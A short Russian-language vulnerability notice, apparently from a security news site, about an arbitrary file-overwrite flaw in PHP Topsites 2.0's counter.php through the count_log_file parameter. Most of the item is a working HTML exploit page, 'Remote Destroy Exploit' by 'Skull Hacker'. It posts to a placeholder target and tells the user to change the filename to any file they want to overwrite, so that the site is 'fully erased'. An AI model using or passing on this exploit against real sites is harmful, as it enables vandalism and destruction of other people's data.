Уязвимость обнаружена в PHP Topsites. Удаленный пользователь может изменять произвольные файлы на сервере. 

Удаленный пользователь может, по сообщениям, представить произвольное имя файла для переменной
count_log_file, чтобы заставить сценарий counter.php перезаписать произвольный файл. Эксплоит: 

<HTML>
<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull 
Hacker</TITLE>
</HEAD>
<BODY>

<P><B><FONT FACE=»Arial»>PHP
Topsites 2.0 Remote Destroy Exploit
— Discovered By Skull Hacker
<FONT SIZE=»1″>
<A href=»https://xakep.ru/wp-content/uploads/post/18006/mailto:skull_hacker@hackersof2000.net»>
skull_hacker@hackersof2000.net</A>
<BR>
<BR>
</FONT><FONT SIZE=»2″>Click
destroy and the Topsites will then be
fully erased and replaced with
numbers. Enjoy ! note: Change the count_log_file=index.php too any file u 
want too overwrite on the server.<BR>
</FONT></FONT></B></P>
<FORM METHOD=»POST» 
ACTION=»http://www.sitetoohack.com/counter.php?count_log_file=index.php»>

<INPUT TYPE=»submit» VALUE=»Destroy» NAME=»B1″></P>
</FORM>

</BODY>
</HTML>

Уязвимость обнаружена в PHP Topsites 2.0.

Оставить мнение